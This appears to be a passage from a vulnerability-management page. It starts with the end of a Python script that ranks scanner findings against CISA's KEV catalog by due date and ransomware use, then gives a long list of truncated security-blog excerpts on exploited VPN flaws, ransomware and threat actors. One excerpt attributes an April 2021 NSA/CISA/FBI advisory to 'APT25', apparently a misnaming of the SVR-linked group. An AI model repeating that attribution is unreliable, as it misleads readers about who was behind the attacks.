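    ("build-03", "CVE-2018-99998"),  # placeholder ID, not in KEV: normal patch cycle
]

TODAY = date(2022, 4, 15)  # fixed so the ordering below is reproducible


@dataclass(frozen=True)
class KevFinding:
    asset: str
    cve: str
    product: str
    due: date
    days_left: int  # negative means the BOD 22-01 due date has already passed
    ransomware: bool

    @property
    def overdue(self) -> bool:
        return self.days_left < 0


def load_catalog(text: str) -> dict[str, dict]:
    """Index the catalog by CVE ID so each scanner finding is a single lookup."""
    return {v["cveID"]: v for v in json.loads(text)["vulnerabilities"]}


def prioritize(findings: Iterable[tuple[str, str]], catalog: dict[str, dict],
               today: date) -> list[KevFinding]:
    """Keep only findings present in KEV and order them for remediation.

    Order: past-due entries first (ransomware-linked ones ahead, then the most
    overdue), then the rest by known ransomware use and nearest due date.
    Findings outside KEV are dropped: they belong to the regular patch cycle.
    """
    rows: list[KevFinding] = []
    for asset, cve in findings:
        entry = catalog.get(cve)
        if entry is None:
            continue
        due = date.fromisoformat(entry["dueDate"])
        rows.append(KevFinding(
            asset=asset,
            cve=cve,
            product=f'{entry["vendorProject"]} {entry["product"]}',
            due=due,
            days_left=(due - today).days,
            ransomware=entry.get("knownRansomwareCampaignUse") == "Known",
        ))
    rows.sort(key=lambda r: (not r.overdue, not r.ransomware, r.days_left))
    return rows


def assets_needing_emergency_patch(rows: Iterable[KevFinding]) -> set[str]:
    """Distinct assets that carry at least one KEV-listed finding."""
    return {r.asset for r in rows}


if __name__ == "__main__":
    for r in prioritize(FINDINGS, load_catalog(KEV_JSON), TODAY):
        state = f"OVERDUE by {-r.days_left}d" if r.overdue else f"due in {r.days_left}d"
        flag = " ransomware" if r.ransomware else ""
        print(f"{r.asset:10} {r.cve:15} {r.product:30} {state}{flag}")
```

The sort key is deliberately a tuple rather than a score: an overdue entry outranks everything else whatever its ransomware flag, which is the ordering BOD 22-01 implies, and the tie-break by days_left keeps the most overdue item on top. Placeholder findings that are not in the catalog drop out of the emergency list entirely instead of being scored low, so the output is the list a remediation owner can act on directly.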
Tenable
CISA’s Binding Operational Directive on Managing Unacceptable Risk Vulnerabilities in Federal Enterprises Is Key to Stopping Federal Cyberattacks
blogs_tenable·2021-11-03
CISA’s Binding Operational Directive on Managing Unacceptable Risk Vulnerabilities in Federal Enterprises Is Key to Stopping Federal Cyberattacks
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Exploits & Vulnerabilities
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay, Sep 21, 2021
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, unp
Huntress
The Top Four CVEs Attackers Exploit | Huntress
blogs_huntress·2021-09-21·CVSS 9.8
[CRITICAL] The Top Four CVEs Attackers Exploit | Huntress
While the move to remote work last year gave many of us comforts such as working in our pajamas and being 10 steps away from the fridge, it’s been a bit of a nightmare for those who work in cybersecurity.
The Institute for Security and Technology reports that in 2020, the victims of ransomware attacks paid $350M in ransom, a more than 300% increase over the previous year. By this year’s end, it’s predicted that cybercrime will cost the world $6 trillion. While cybercrime is a lucrative gig for hackers, it's expensive for the rest of us—and unfortunately, it's only getting worse with remote work.
In many ways, remote work has removed many of the security measures that organizations typically put in place to keep their data and networks secure. For example, corporate networks usually only
Tenable
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
blogs_tenable·2021-08-25
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
Securelist
IT threat evolution Q2 2021
blogs_securelist·2021-08-12·CVSS 7.8
[HIGH] IT threat evolution Q2 2021
Table of Contents
- Targeted attacks
- Other malware
Authors
- David Emm
## Targeted attacks
### The leap of a Cycldek-related threat actor
It is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous “DLL side-loading triad”: a legitimate executable, a malicious DLL to be side-loaded by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of LuckyMouse, but we have observed other groups using similar “triads”, including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.
We recently described one such file, called “FoundCore”, which caught our atte
Qualys
CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
blogs_qualys·2021-07-29·CVSS 10.0
[CRITICAL] CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
#### Table of Contents
- Top Routinely Exploited Vulnerabilities
- Detect CISA's Top Routinely Exploited Vulnerabilities using Qualys VMDR
- Recommendations
- Remediation and Mitigation
- Get Started Now
On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a cybersecurity advisory detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.
The advisory states, “If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the large
Checkpoint
26th July – Threat Intelligence Report
blogs_checkpoint·2021-07-26·CVSS 10.0
CVE-2019-11510 [CRITICAL] 26th July – Threat Intelligence Report
## 26th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 26th July, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
US officials have reported that Chinese state-sponsored threat actors successfully breached 13 US oil and natural gas pipeline companies between 2011 and 2013. The hackers gained initial access using a spear-phishing campaign, and their main goal was to gain strategic access and disrupt US pipeline operations.
The French Natio
Tenable
Focus on the Fundamentals: 6 Steps to Defend Against Ransomware
blogs_tenable·2021-07-21
Focus on the Fundamentals: 6 Steps to Defend Against Ransomware
Securelist
Black Kingdom ransomware
blogs_securelist·2021-06-17·CVSS 10.0
CVE-2021-27065 [CRITICAL] Black Kingdom ransomware
Table of Contents
- Background
- Technical analysis
- Victims
- Attribution
- Appendix I – Indicators of Compromise
- Appendix II – MITRE ATT&CK Mapping
Authors
- Marc Rivero
## Python-coded malware used in Microsoft Exchange Server exploitation
Black Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).
The complexity and sophistication of the Black Kingdom family cannot bear a comparison with other Ransomware-as-a-Service (RaaS) or Big Game Hunting (BGH) families. The ransomware is coded in Python and compiled to an executable using PyInstaller; it supports two encryption modes: one generated dynamically and one using a h
Zscaler
Reduce Business Risk by Eliminating the VPN Attack Surface
blogs_zscaler·2021-05-27
Reduce Business Risk by Eliminating the VPN Attack Surface
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Cyber Threats
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay, Apr 28, 2021
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabili
Talos
Threat Advisory: Pulse Secure Connect Coverage
blogs_talos·2021-04-22·CVSS 10.0
CVE-2021-22893 [CRITICAL] Threat Advisory: Pulse Secure Connect Coverage
## Threat Advisory: Pulse Secure Connect Coverage
Pulse Secure announced that a critical vulnerability (CVE-2021-22893) was discovered in their VPN service "Pulse Secure Connect" in a recent security advisory.
The advisory states that, "a vulnerability was discovered under Pulse Connect Secure (PCS). This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway. This vulnerability has a critical CVSS score and poses a significant risk to your deployment."
The company released a blog post alongside this advisory disclosing that the vulnerability has been exploited in the wild. According to the blog post, several other previously known vulnerabilities were exploited during these incidents:
- CVE-2019-11510
- CVE-2020-8243
- CVE-2
Tenable
CVE-2021-22893: Zero-Day Vulnerability in Pulse Connect Secure Exploited in the Wild
blogs_tenable·2021-04-20·CVSS 10.0
[CRITICAL] CVE-2021-22893: Zero-Day Vulnerability in Pulse Connect Secure Exploited in the Wild
Checkpoint
19th April – Threat Intelligence Report
blogs_checkpoint·2021-04-19·CVSS 9.8
CVE-2018-13379 [CRITICAL] 19th April – Threat Intelligence Report
## 19th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 19th April, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
The U.S. National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have published a joint advisory warning that a Russia-linked APT group, APT25, is exploiting five vulnerabilities in an ongoing attack against U.S. targets.
Check Point IPS provide
Talos
Threat Advisory: NSA SVR Advisory Coverage
blogs_talos·2021-04-15·CVSS 9.1
[CRITICAL] Threat Advisory: NSA SVR Advisory Coverage
## Threat Advisory: NSA SVR Advisory Coverage
The U.S. National Security Agency released an advisory outlining several vulnerabilities that the Russian Foreign Intelligence Services (SVR) is exploiting in the wild. The U.S. formally attributed the recent SolarWinds supply chain attack to the SVR group in this advisory and detailed more of the group's tactics, techniques and procedures.
The exploits included a series of five CVEs that affect VPN solutions, collaboration suite software and virtualization technologies. All five of the CVEs have been patched — Cisco Talos encourages everyone with the affected software to update immediately. Some of these vulnerabilities also have working Metasploit modules and are currently being widely exploited. Please note that some of these vulnerabilities exploit applications leveraging SSL. This means
Checkpoint
5th April – Threat Intelligence Report
blogs_checkpoint·2021-04-05
CVE-2021-21975 5th April – Threat Intelligence Report
## 5th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 5th April, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Personal information of some 553 million Facebook users from 100 countries has been stolen and published online for free in a hacking forum. The records include full name, Facebook ID, phone number, email, location, bio and more.
Iranian APT group Charming Kitten, linked to the government, has launched a new phishing campaign
Trendmicro
Security 101: Virtual Patching
blogs_trendmicro·2021-03-22·CVSS 10.0
[CRITICAL] Security 101: Virtual Patching
Vulnerability Exploitation
## Security 101: Virtual Patching
Virtual patching, also called vulnerability shielding, acts as a security measure against threats that exploit known and unknown vulnerabilities.
By: Trend Micro Mar 22, 2021
Original article by Trend Micro
Companies' online infrastructures are becoming ever more complex, from decentralization through to the use of cloud, mobility and Internet-of-Things (IoT) technologies. As a result, patch management is also becoming ever more time-consuming and resource-intensive. Yet delaying or postponing the rollout of patches carries a high risk. Das zeigen auch die Zahlen für 2019, als 60% der Sicherheitsvorfälle auf nicht eing
Tenable
Healthcare Security: Ransomware Plays a Prominent Role in COVID-19 Era Breaches
blogs_tenable·2021-03-10
Healthcare Security: Ransomware Plays a Prominent Role in COVID-19 Era Breaches
Trendmicro
Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
blogs_trendmicro·2021-02-23·CVSS 10.0
[CRITICAL] Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
Cyber Threats
## Hindsight is 2020: Looking Back on the Year From a Cybersecurity Perspective
As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cybersecurity report.
By: Trend Micro Research Feb 23, 2021
2020 was a most unprecedented year given the circumstances under which it unfolded. The Covid-19 pandemic and the other significant events that occurred throughout the year had a lasting impact on the cybersecurity landscape, causing upheavals on many fronts. As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual
Trendmicro
Examining a Sodinokibi Attack
blogs_trendmicro·2021-01-26·CVSS 9.1
[CRITICAL] Examining a Sodinokibi Attack
# Examining A Sodinokibi Attack
Sodinokibi was behind several notable attacks last year. In this entry, we describe its attack process using some of the examples we encountered.
By: Trend Micro Research
2021/01/26
Read time: ( words)
Save to Folio
Sodinokibi was first detected in April 2019 and linked to the retired GandCrab. From that point on, Sodinokibi launched several high-profile attacks that continued throughout 2020, thus making a name for itself as one of the ransomware families that should be watched out for. Here we describe Sodinokibi’s typical attack process.
Technical analysis
The threat actors behind Sodinokibi typically hire a variety of affiliates for their initial access. Their attacks often begin with familiar techniques like malspam emails with spear-phishing lin
Tenable
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
blogs_tenable·2021-01-21
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
Unit42
Threat Brief: FireEye Red Team Tool Breach
blogs_unit42·2020-12-11
Threat Brief: FireEye Red Team Tool Breach
## Threat Brief: FireEye Red Team Tool Breach
Unit 42
Published: December 10, 2020
## Executive Summary
On Dec. 8, 2020, one of the leading cybersecurity companies in the industry, FireEye, reported a breach and data exfiltration unlike any that we have seen previously. What makes this attack unique is not only the target, FireEye being a well-known cybersecurity company, but that the stolen data contains the internal, custom-crafted red-team and penetration testing tools used by the company to imitate different threat actors during customer security consultations. FireEye’s blog provided a wealth of information for defenders to implement security controls and mitigations for defense against the stolen tools. This data is being used by Palo Alto Networks to help ensure our customers are protected if the attackers choose to utilize the tools for malicious purposes.
It i
Fortinet
FireEye Red Team Tool Breach | Fortinet
blogs_fortinet·2020-12-11·CVSS 8.8
[HIGH] FireEye Red Team Tool Breach | Fortinet
FireEye Red Team Tool Breach
By Carl Windsor | December 11, 2020
Executive Summary
On December 8th cyber security vendor FireEye reported a breach of their network and data exfiltration which included their internally developed Red Team tools. FireEye took the step of publishing details of these tools in a GitHub repository to allow other vendors to protect against their use by potential adversaries.
This breach has been attributed to a nation-state threat actor, so we do not expect to see these tools widely abused in the wild; however, with the additional information provided by FireEye, Fortinet has been able to ensure that these tools cannot be abused.
Threat Mitigation
None of the vulnerabilities disclosed as targeted in the tools were zero days, therefore FortiGuard
Qualys
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach
blogs_qualys·2020-12-10
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach
Update Jan 5, 2021: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.
Update Dec 23, 2020: Added a new section on compensating controls.
Update Dec 22, 2020: FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.
Using Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):
- Active Attacks
- Solorigate Sunburst (New RTI)
Original post: On December 8, 2020, FireEye disclosed theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security
Checkpoint
26th October – Threat Intelligence Bulletin
blogs_checkpoint·2020-10-26
CVE-2020-3118 26th October – Threat Intelligence Bulletin
## 26th October – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 26th October 2020, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
The voter database in Hall County, Georgia, used to verify voter signatures, has been breached by ransomware, alongside other government systems. This might be the first official election resource to be hit by ransomware. The ‘DoppelPaymer’ gang has claimed responsibility for the attack.
US officials warn against a R
Tenable
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
blogs_tenable·2020-10-23
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
Qualys
NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities | Qualys
blogs_qualys·2020-10-22·CVSS 9.8
CVE-2020-15505 [CRITICAL] NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities | Qualys
#### Table of Contents
- Detect 25 Publicly Known Vulnerabilities using VMDR
Update November 25, 2020: The UK National Cyber Security Centre alerts that APT nation-state groups and cybercriminals are exploiting MobileIron RCE vulnerability (CVE-2020-15505).
Original post: On October 20, 2020, the United States National Security Agency (NSA) released a cybersecurity advisory on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.
“Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and mitigation efforts,” said the NSA advisory. It also recommended “crit
Tenable
CVE-2020-5135: Critical SonicWall VPN Portal Stack-based Buffer Overflow Vulnerability
blogs_tenable·2020-10-15·CVSS 9.8
[CRITICAL] CVE-2020-5135: Critical SonicWall VPN Portal Stack-based Buffer Overflow Vulnerability
Tenable
CVE-2020-1472: Advanced Persistent Threat Actors Use Zerologon Vulnerability In Exploit Chain with Unpatched Vulnerabilities
blogs_tenable·2020-10-12·CVSS 5.5
[MEDIUM] CVE-2020-1472: Advanced Persistent Threat Actors Use Zerologon Vulnerability In Exploit Chain with Unpatched Vulnerabilities
Tenable
US Cybersecurity Agency CISA Alert: Foreign Threat Actors Continue to Target Unpatched Vulnerabilities
blogs_tenable·2020-09-17
US Cybersecurity Agency CISA Alert: Foreign Threat Actors Continue to Target Unpatched Vulnerabilities
Sentinelone
Threat Intel | Cyber Attacks Leveraging the COVID-19/CoronaVirus Pandemic
blogs_sentinelone·2020-09-04
Threat Intel | Cyber Attacks Leveraging the COVID-19/CoronaVirus Pandemic
## Threat Intel | Cyber Attacks Leveraging the COVID-19/CoronaVirus Pandemic
At Sentinel Labs, we have been closely tracking adversarial behavior as it pertains to COVID-19/Coronavirus. To date, we have observed a significant number of malware campaigns, spam campaigns, and outright scams that are preying on the fears and uncertainties of the global population.
Updates are tagged in-line with respective dates within each section of this post.
## September 2020
[September 9, 2020]
On August 27, the Health Sector Cybersecurity Coordination Center (HC3) released report ID: 202008271653. This report details a specific phishing campaign used to distribute the Agent Tesla RAT. The lure in the emails is centered around updates to COVID-specific PPE (Personal Protection Equipment). We have seen similar campaigns running since late April / early May, and these current e
Unit42
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
blogs_unit42·2020-08-26
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
## The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
Jay Chen
Published: August 26, 2020
## Executive Summary
With the ever-increasing number of new vulnerabilities, vulnerability management becomes one of the most critical processes in ensuring continuous business operation. While it is clear that timely patching is essential, it’s also important to know quantitatively how a delay could increase risk. What is the chance that attackers breach my organization using a CVE just disclosed or using an unknown (zero-day) vulnerability? To understand the state of vulnerability disclosure and exploit development, Unit 42 researchers analyzed 45,450 publicly available exploits in Exploit Database at the time of this writing. The research correlated the exploit data with vulnerability and patch information to study exploit development in multiple facets.
The research reveals that:
Securelist
Incident Response Analyst Report of 2019
blogs_securelist·2020-08-06
Incident Response Analyst Report of 2019
Table of Contents
- Executive summary
- Recommendations
- Reasons for incident response
- Distribution of reasons for top regions
- Distribution of reasons for industries
- Initial vectors or how adversaries get in
- Tools and exploits
- Attack duration
- Operational metrics
- How fast we responded
- How long response took
- MITRE ATT&CK tactics and techniques
- Conclusion
Authors
- Ayman Shaaban
- Grigory Sablin
- Kaspersky GERT
Download full report (PDF)
As an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries’ cyber-incident tactics and techniques used in the wild. In this report, we share our teams’ conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights,
Tenable
CVE-2020-2021: Palo Alto Networks PAN-OS Vulnerable to Critical Authentication Bypass Vulnerability
blogs_tenable·2020-06-29·CVSS 10.0
[CRITICAL] CVE-2020-2021: Palo Alto Networks PAN-OS Vulnerable to Critical Authentication Bypass Vulnerability
Talos
Quarterly report: Incident Response trends in Summer 2020
blogs_talos·2020-06-15
Quarterly report: Incident Response trends in Summer 2020
By David Liebenberg and Caitlin Huey.
For the fourth quarter in a row, Ryuk dominated the threat landscape in incident response. As we mentioned in last quarter’s report, Ryuk has shifted from relying on commodity trojans to using living-off-the-land tools. This has led to a decrease in observations of attacks leveraging commodity trojans. Email remained the top infection vector, though we observe increased compromises of remote desktop services (RDS) as well as Citrix devices and Pulse VPN. One of the more interesting trends this quarter was the role of the COVID-19 pandemic. Interestingly, we did not observe any engagements in which COVID-19 was used in an attack. However, CTIR has observed the pandemic impacting organizations, affecting their ability to respond and contain cybersecurit
Unit42
Threat Brief: Maze Ransomware
blogs_unit42·2020-05-08·CVSS 7.8
[HIGH] Threat Brief: Maze Ransomware
## Executive Summary
Since the beginning of the calendar year, Palo Alto Networks has detected an uptick in Maze ransomware samples across multiple industries. As a result, we've created this general threat assessment post on the Maze ransomware activities and full visualization of these techniques can be viewed in the Unit 42 Playbook Viewer.
Maze ransomware, a variant of ChaCha ransomware, was first observed in May 2019 and has targeted organizations in North America, South America, Europe, Asia, and Australia. This ransomware is typically distributed via emails containing weaponized Word or Excel attachments. However, it has also been distributed via exploit kits such as the Spelevo Exploit Kit, which has been used with Flash Player vulnerabilities CVE-2018-15982 and CVE-2018-4878. Ma
Unit42
Threat Brief: Maze Ransomware
blogs_unit42·2020-05-08·CVSS 7.8
[HIGH] Threat Brief: Maze Ransomware
## Threat Brief: Maze Ransomware
Brittany Barbehenn
Doel Santos
Published: May 8, 2020
## Executive Summary
Since the beginning of the calendar year, Palo Alto Networks has detected an uptick in Maze ransomware samples across multiple industries. As a result, we've created this general threat assessment post on the Maze ransomware activities and full visualization of these techniques can be viewed in the Unit 42 Playbook Viewer.
Maze ransomware, a variant of ChaCha ransomware, was first observed in May 2019 and has targeted organizations in North America, South America, Europe, Asia, and Australia. This ransomware is typically distributed via emails containing weaponized
Checkpoint
27th April – Threat Intelligence Bulletin
blogs_checkpoint·2020-04-27·CVSS 10.0
CVE-2019-11510 [CRITICAL] 27th April – Threat Intelligence Bulletin
## 27th April – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 27th April 2020, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Check Point has investigated a Business Email Compromise attack targeting a financial organization and their business partner. The attacking group, the Florentine Banker, manipulated four transactions of over 1 million GBP into their own bank accounts using advanced phishing tactics to target the mail accounts of key i
Tenable
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
blogs_tenable·2020-04-13
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
Tenable
How COVID-19 Response Is Expanding the Cyberattack Surface
blogs_tenable·2020-03-30
How COVID-19 Response Is Expanding the Cyberattack Surface
Checkpoint
17th February – Threat Intelligence Bulletin
blogs_checkpoint·2020-02-17·CVSS 10.0
CVE-2019-11510 [CRITICAL] 17th February – Threat Intelligence Bulletin
## 17th February – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 17th February 2020, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Terrorist organization Hamas has targeted Israeli soldiers using a catfishing attack. Check Point researchers have detailed how the attack took place, in a manner similar to ones used in the past by APT-C-23. Hamas operatives have disguised themselves as attractive single women who convinced the soldiers
Checkpoint
13th January – Threat Intelligence Bulletin
blogs_checkpoint·2020-01-13·CVSS 7.8
CVE-2019-2215 [HIGH] 13th January – Threat Intelligence Bulletin
## 13th January – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 13th January 2020, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Austria’s foreign ministry has suffered a serious cyber-attack, allegedly conducted by a foreign state.
US government-funded low-cost UMX mobile phones include preinstalled “unremovable” malware. The malware, a variant of HiddenAds, is suspected to be of Chinese origin, as is the UMX phone itself.
Three malicious
Tenable
CVE-2019-11510: Critical Pulse Connect Secure Vulnerability Used in Sodinokibi Ransomware Attacks
blogs_tenable·2020-01-07·CVSS 10.0
[CRITICAL] CVE-2019-11510: Critical Pulse Connect Secure Vulnerability Used in Sodinokibi Ransomware Attacks
Volexity
Vulnerable Private Networks: Corporate VPNs Exploited in the Wild
blogs_volexity·2019-09-11·CVSS 10.0
[CRITICAL] Vulnerable Private Networks: Corporate VPNs Exploited in the Wild
Threat Intelligence
# Vulnerable Private Networks: Corporate VPNs Exploited in the Wild
September 11, 2019
Sean Koessel and Steven Adair
The details of multiple, critical Pulse Secure SSL VPN vulnerabilities are well known; they were disclosed in detail by two security researchers as part of a talk at Black Hat USA 2019 on August 7, 2019. What has not been widely covered, but should come as no surprise, is that APT actors have been actively exploiting these vulnerabilities in order to gain access to targeted networks. The vulnerability being exploited is CVE-2019-11510, which allows a remote unauthenticated attacker to send specially crafted requests that allow read access of arbitrary files on the Pulse Secure VPN. This includes access to databases that the VPN server uses to track se
Tenable
CVE-2018-13379, CVE-2019-11510: FortiGate and Pulse Connect Secure Vulnerabilities Exploited In the Wild
blogs_tenable·2019-08-27·CVSS 9.1
[CRITICAL] CVE-2018-13379, CVE-2019-11510: FortiGate and Pulse Connect Secure Vulnerabilities Exploited In the Wild
Tenable
CVE-2019-11510: Proof of Concept Available for Arbitrary File Disclosure in Pulse Connect Secure
blogs_tenable·2019-08-21·CVSS 10.0
[CRITICAL] CVE-2019-11510: Proof of Concept Available for Arbitrary File Disclosure in Pulse Connect Secure
Threat Intel
APT29 (APT29, IRON RITUAL, IRON HEMLOCK)
threat_intel
APT29 (APT29, IRON RITUAL, IRON HEMLOCK)
# Threat Actor Profile: APT29
ATT&CK ID: G0016
Also known as: APT29, IRON RITUAL, IRON HEMLOCK, NobleBaron, Dark Halo, NOBELIUM, UNC2452, YTTRIUM, The Dukes, Cozy Bear, CozyDuke, SolarStorm, Blue Kitsune, UNC3524, Midnight Blizzard
Suspected origin: Russia
## Overview
APT29 is a threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. APT29 reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DN
Recorded Future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
blogs_recorded_future
Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
# Remote Threats to Remote Employees: How Working From Home Increases the Attack Surface
In response to the COVID-19 pandemic, many organizations have shifted to working from home for the foreseeable future — this means that organizations will have a largely (or entirely) remote workforce for the first time.
This creates a situation that is ripe for cybercriminals and nation-state actors to exploit. As we have observed with the rapid adoption of COVID-19-themed scams and attacks against the Olympics, threat actors — both nation-state and cybercriminal — are quick to exploit new and evolving situations.
For security teams, the sudden change in an organization’s network topology means a vastly expanded attack surface with little time to adapt to the new reality. For employees, generally,
Sentinelone
NetWalker
blogs_sentinelone·CVSS 10.0
[CRITICAL] NetWalker
# NetWalker Ransomware: In-Depth Analysis, Detection, Mitigation, and Removal
## Summary of NetWalker Ransomware
NetWalker ransomware, also known as Mailto, was first seen in mid-2019. It started out as a private service, but eventually switched to a Ransomware-as-a-Service model, which made it more accessible. During the pandemic, NetWalker was especially known for targeting medical and healthcare facilities. It also uses double extortion tactics, asking for payment for a decryptor as well as a promise not to release any stolen data.
## What Does NetWalker Ransomware Target?
NetWalker ransomware has impacted a wide range of victims, including companies, municipalities, hospitals, law enforcement, emergency services, school districts, colleges, and universities. The healthcare sector h
Sentinelone
REvil
blogs_sentinelone
REvil
# REvil Ransomware: In-Depth Analysis, Detection, and Mitigation
As if ransomware itself wasn’t dangerous enough, a new type of attack involving ransomware is making waves in the cybersecurity community. Ransomware-as-a-Service (RaaS) operations are becoming more common and more profitable for threat actors looking to launch a variety of attacks. One such operation is known as REvil, and involved a core team of threat actors offering the malware to other attackers for a price.
Although the Russian Federal Security Service claims to have dismantled REvil and charged several of the ransomware group’s members, a deeper look at this type of ransomware and RaaS can help organizations protect themselves against these types of attacks in the future.
## What Is REvil Ransomware?
REvil ransomwa
Sentinelone
Maze
blogs_sentinelone
Maze
# Maze Ransomware: In-Depth Analysis, Detection, and Mitigation
Since its discovery in 2019, Maze ransomware has consistently made headlines due to its infamous attacks on MSPs and its ability to move laterally to other networks. Although this particular strain of ransomware has been used to attack businesses and governmental organizations, its attacks on MSPs are worrying since a single compromise can create a cascade effect on the MSP’s clients, their business partners, and so on.
Maze was reportedly shut down in 2020, but there still exist numerous similar ransomware strains posing threats to businesses around the world today. A deeper understanding of Maze ransomware may help organizations strengthen their cybersecurity defenses against similar types of ransomware attacks in the future.
Recorded Future
In Before The Lock: ESXi | Recorded Future
blogs_recorded_future
In Before The Lock: ESXi | Recorded Future
## In Before The Lock: ESXi
## Executive Summary
As organizations continue virtualizing their critical infrastructure and business systems, threat actors deploying ransomware have responded in kind. Between 2021 and 2022 we observed an approximately 3-fold increase in ransomware targeting ESXi, with offerings available from many groups including ALPHV, LockBit, and BlackBasta. We identified and described detection strategies for multiple TTPs that are often seen prior to the dropping of the ransomware payload in order to create detections and mitigations that are based on real-world, threat-actor use of these tools. In addition to providing tool-specific detections such as YARA and Sigma rules, we also identified detections for common enumeration, exploitation, and persistence technique
Huntress
The Top Four CVEs Attackers Exploit | Huntress
blogs_huntress·CVSS 9.8
[CRITICAL] The Top Four CVEs Attackers Exploit | Huntress
While the move to remote work last year gave many of us comforts such as working in our pajamas and being 10 steps away from the fridge, it’s been a bit of a nightmare for those who work in cybersecurity.
The Institute for Security and Technology reports that in 2020, the victims of ransomware attacks paid $350M in ransom—a more than 300% increase over the previous year. By this year’s end, it’s predicted that cybercrime will cost the world $6 trillion. While cybercrime is a lucrative gig for hackers, it's expensive for the rest of us—and unfortunately, it's only getting worse with remote work.
In many ways, remote work has removed many of the security measures that organizations typically put in place to keep their data and networks secure. For example, corporate networks usually only a
arXiv
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
arxiv_fulltext·2025-02-16
VulRG: Multi-Level Explainable Vulnerability Patch Ranking for Complex Systems Using Graphs
